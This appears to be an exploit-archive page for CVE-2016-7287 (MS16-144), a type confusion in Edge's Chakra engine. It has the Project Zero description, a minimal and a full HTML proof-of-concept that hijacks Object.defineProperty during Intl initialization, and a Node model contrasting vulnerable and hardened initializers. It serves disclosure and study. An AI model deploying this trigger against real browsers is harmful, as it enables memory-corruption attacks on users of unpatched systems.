Microsoft Edge Intl. Initialization Type Confusion (MS16-144) Exploit
Reporter | Title | Published | Views | Family
---|---|---|---|---
Symantec | Microsoft Internet Explorer and Edge CVE-2016-7287 Remote Memory Corruption Vulnerability | 13 Dec 2016 00:00 | – | symantec
Exploit DB | Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144) | 21 Dec 2016 00:00 | – | exploitdb
Check Point Advisories | Microsoft Browser Scripting Engine Memory Corruption (MS16-145: CVE-2016-7287) | 13 Dec 2016 00:00 | – | checkpoint_advisories
Microsoft CVE | Scripting Engine Memory Corruption Vulnerability | 13 Dec 2016 08:00 | – | mscve
CVE | CVE-2016-7287 | 20 Dec 2016 06:59 | – | cve
Prion | Memory corruption | 20 Dec 2016 06:59 | – | prion
Cvelist | CVE-2016-7287 | 20 Dec 2016 05:54 | – | cvelist
NVD | CVE-2016-7287 | 20 Dec 2016 06:59 | – | nvd
OpenVAS | Microsoft Internet Explorer Multiple Vulnerabilities (3204059) | 14 Dec 2016 00:00 | – | openvas
OpenVAS | Microsoft Edge Multiple Vulnerabilities (3204062) | 14 Dec 2016 00:00 | – | openvas
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=972
In Chakra, Internationalization is initialized the first time the Intl object is used, by executing the script in Intl.js (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/InJavascript/Intl.js). This code attempts to prevent Object methods from being redefined by user scripts, but there are a few stray calls to Object.defineProperty in initialization. If Object.defineProperty is redefined before Intl is initialized, a user-defined method can be called during initialization.

If this method defines a Collator (or DateTimeFormat or NumberFormat) getter and setter on the Intl object, it can intercept what it is set to, and set it to a different value instead. This will then cause type confusion in IntlEngineInterfaceExtensionObject::deletePrototypePropertyHelper (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/IntlEngineInterfaceExtensionObject.cpp), as this function assumes the properties of a Collator are objects, when they are not guaranteed to be.

A minimal PoC is as follows, and a full PoC is attached.
    var d = Object.defineProperty;
    var noobj = {
        get: function () {
            return 0x1234567 >> 1;
        },
        set: function () {
        }
    };
    function f(){
        var i = Intl;
        Intl = {}; // this somehow prevents an exception that prevents loading
        d(i, "Collator", noobj);
    }
    Object.defineProperty = f;
    var q = new Intl.NumberFormat(["en"]);
-->
<html><body><script>
// Keep a reference to the genuine Object.defineProperty before it is replaced
// below; f() needs it to install the accessor on the real Intl object.
var d = Object.defineProperty;

// Accessor that will be installed as Intl.Collator. The getter hands back a
// small integer (0x91A2B3, a tagged int in the engine) where Intl.js and
// IntlEngineInterfaceExtensionObject::deletePrototypePropertyHelper expect the
// Collator constructor object.
var noobj = {
    get: function () {
        print("in get no");  // print() is the ChakraCore shell (ch.exe) builtin; in a browser it resolves to window.print()
        return 0x1234567 >> 1;
    },
    set: function () {
        print("in set no");
    }
};

// Runs in place of Object.defineProperty when the stray call in Intl.js
// executes. The original Intl object is kept in i; the global is swapped for
// an empty object, which (per the report) avoids an exception that would
// otherwise abort initialization before the getter is consulted.
function f(...a){
    var i = Intl;
    Intl = {};
    d(i, "Collator", noobj);
}

// Turn Object.defineProperty into an accessor whose getter returns f, so the
// next lookup of Object.defineProperty by Intl.js resolves to f.
var pattern = {
    get: function () {
        return f;
    },
    set: function () {
    }
};
Object.defineProperty(Object, "defineProperty", pattern);

// First use of Intl triggers the one-time Intl.js initialization, which now
// calls f() and then reads the confused Intl.Collator.
var q = new Intl.NumberFormat(["en"]);
</script></body></html>
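The interposition the report describes (a stray call that resolves Object.defineProperty at call time, and an accessor that returns a tagged int where a constructor object is expected), together with the hardened form Intl.js intended, modeled in plain JavaScript as an added example that runs under Node. This is not Chakra's code and not the Project Zero PoC: initIntlUnsafe, initIntlSafe, installDefinePropertyHijack and runUnderHijack are hypothetical stand-ins for Intl.js, the Intl object and the attacker script, and the `Intl = {}` global swap from the PoC above is not reproduced. In this model the confused read surfaces as a TypeError; in the engine's native deletePrototypePropertyHelper the equivalent read has no such check, which is the reported memory corruption.

```javascript
// Added example (not Chakra or Project Zero code): a plain-JavaScript model of
// the Object.defineProperty interposition behind CVE-2016-7287.

// What Intl.js intended for every call: capture the real builtins before any
// user script can touch them.
const builtinDefineProperty = Object.defineProperty;
const builtinGetOwn = Object.getOwnPropertyDescriptor;

// Attacker side, as in the PoC: make `Object.defineProperty` an accessor on the
// Object constructor so that a call-time lookup resolves to our function.
// Returns a function that puts the builtin back.
function installDefinePropertyHijack() {
  builtinDefineProperty(Object, "defineProperty", {
    configurable: true,
    get() {
      return function hijack(target, name /* descriptor ignored */) {
        // Where the initializer wanted to store its constructor, store an
        // accessor whose getter returns a small integer (a tagged int).
        builtinDefineProperty(target, name, {
          configurable: true,
          get() { return 0x1234567 >> 1; },
          set() {},
        });
      };
    },
    set() {},
  });
  return function restore() {
    builtinDefineProperty(Object, "defineProperty", {
      value: builtinDefineProperty, writable: true, configurable: true, enumerable: false,
    });
  };
}

// Hypothetical stand-in for the vulnerable Intl.js path: one stray call goes
// through the live `Object.defineProperty`, and the follow-up step (the analogue
// of deletePrototypePropertyHelper) assumes intl.Collator is an object.
function initIntlUnsafe(intl) {
  function Collator() {}
  Collator.prototype = { compare() { return 0; } };
  Object.defineProperty(intl, "Collator", { value: Collator, writable: true, configurable: true });
  const ctor = intl.Collator;      // whatever the attacker's getter returns
  delete ctor.prototype.compare;   // a number has no .prototype, so this throws TypeError
  return typeof ctor;
}

// Hardened stand-in: only the captured builtin is used, and the stored value is
// checked to be a data property holding a function before it is treated as one.
function initIntlSafe(intl) {
  function Collator() {}
  Collator.prototype = { compare() { return 0; } };
  builtinDefineProperty(intl, "Collator", { value: Collator, writable: true, configurable: true });
  const desc = builtinGetOwn(intl, "Collator");
  if (!desc || !("value" in desc) || typeof desc.value !== "function") {
    throw new TypeError("Intl.Collator was tampered with during initialization");
  }
  delete desc.value.prototype.compare;
  return typeof desc.value;
}

// Run an initializer against a fresh Intl stand-in while the hijack is active,
// report what happened, and always restore Object.defineProperty afterwards.
function runUnderHijack(init) {
  const restore = installDefinePropertyHijack();
  try {
    return { result: init({}), error: null };
  } catch (e) {
    return { result: null, error: e.constructor.name };
  } finally {
    restore();
  }
}

// Demonstration: the unsafe path is confused under the hijack, the safe one is not.
console.log("unsafe, no hijack:", initIntlUnsafe({}));
console.log("unsafe, hijacked: ", runUnderHijack(initIntlUnsafe));
console.log("safe, hijacked:   ", runUnderHijack(initIntlSafe));
```

The restore step matters for anything that runs after the model: while the accessor is installed, every caller that looks up Object.defineProperty at call time (libraries, the host runtime) gets the hijack instead of the builtin, which is exactly the property the exploit relies on.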
# 0day.today [2018-01-10] #